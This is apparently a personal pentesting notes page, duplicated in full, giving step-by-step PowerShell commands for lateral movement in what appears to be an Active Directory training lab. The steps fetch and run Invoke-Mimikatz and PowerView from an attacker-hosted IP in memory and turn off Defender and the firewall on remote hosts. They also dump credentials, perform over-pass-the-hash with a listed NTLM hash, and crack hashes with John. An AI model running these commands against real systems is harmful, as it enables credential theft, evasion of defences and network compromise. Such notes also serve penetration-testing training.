Move Lat-Invoke-Command

Get Hashes and move Lateral

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1


#Find where you have localadminacces
Find-LocalAdminAccess –Verbose
#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where wher are logged in:
Invoke-UserHunter


#Step Two: check if we have Admin access:
Invoke-UserHunter -CheckAccess


#Step Three: Check if we execute command:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}


#Step Four: Create a Session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess

#Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
or
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing) 


#Step Six: Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#Step Eight: Invoke-Mimikatz from memory:
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess
then exit the remote connection --IMPORTANT


#Step Nine: Over the Pass Hash
#Open PowerShell Admin from Local Computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform Over the Hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"


#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has a connection
whoami
Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local


Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -Computername


#Over pass the hash" generate tokens from hashes.
#Need to run powershell from local machine as admin
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"


#Crack Hash
john --format=nt hash


#Download for Windows
https://www.techspot.com/downloads/6970-john-the-ripper.html

PreviousMove Lat-AppLocker

Last updated 4 years ago

Was this helpful?

Get Hashes and move Lateral

Invoke-WebRequest http://172.16.100.29/Invoke-Mimikatz.ps1 -OutFile C:\Invoke-Mimikatz.ps1
Invoke-WebRequest http://172.16.100.29/powerview.ps1 -OutFile C:\powerview.ps1
Import-Module C:\powerview.ps1
Import-Module C:\Invoke-Mimikatz.ps1


#Find where you have localadminacces
Find-LocalAdminAccess –Verbose
#Tools
Find-WMILocalAdminAccess.ps1 
FindPSRemotingLocalAdminAccess.ps1
#Step One: Find where wher are logged in:
Invoke-UserHunter


#Step Two: check if we have Admin access:
Invoke-UserHunter -CheckAccess


#Step Three: Check if we execute command:
Invoke-Command -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local -ScriptBlock{whoami;hostname;whoami /priv}


#Step Four: Create a Session:
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
$sess

#Step Five: Invoke-Mimikatz in memory to get NTLM (You need to be hosting ps1 with HS1):
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1)
or
iex (iwr http://172.16.100.29/Invoke-Mimikatz.ps1 -UseBasicParsing) 


#Step Six: Disable AV and Firewall
Invoke-Command -ScriptBlock{Set-MpPreference -DisableRealtimeMonitoring $true} -Session $sess
Invoke-Command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
Invoke-Command -ScriptBlock{netsh advfirewall set allprofiles state off} -Session $sess


#Step Eight: Invoke-Mimikatz from memory:
Invoke-Command -ScriptBlock ${function:Invoke-mimikatz} -Session $sess
then exit the remote connection --IMPORTANT


#Step Nine: Over the Pass Hash
#Open PowerShell Admin from Local Computer
#Disable AV
Set-MpPreference -DisableRealtimeMonitoring $true
#Import-Mimikatz
Import-Module .\Invoke-Mimikatz.ps1
#Perform Over the Hash attack:
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8 /run:powershell.exe"


#Step Ten: It opens a new PowerShell with the svcadmin token
#Therefore, you can connect to the server where the account has a connection
whoami
Invoke-command -ScriptBlock{whoami;hostname} -Computer dcorp-dc.dollarcorp.moneycorp.local


Invoke-Mimikatz -DumpCreds
Invoke-Mimikatz -DumpCreds -Computername


#Over pass the hash" generate tokens from hashes.
#Need to run powershell from local machine as admin
Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:dollarcorp.moneycorp.local /ntlm:<ntlmhash> /run:powershell.exe"


#Crack Hash
john --format=nt hash


#Download for Windows
https://www.techspot.com/downloads/6970-john-the-ripper.html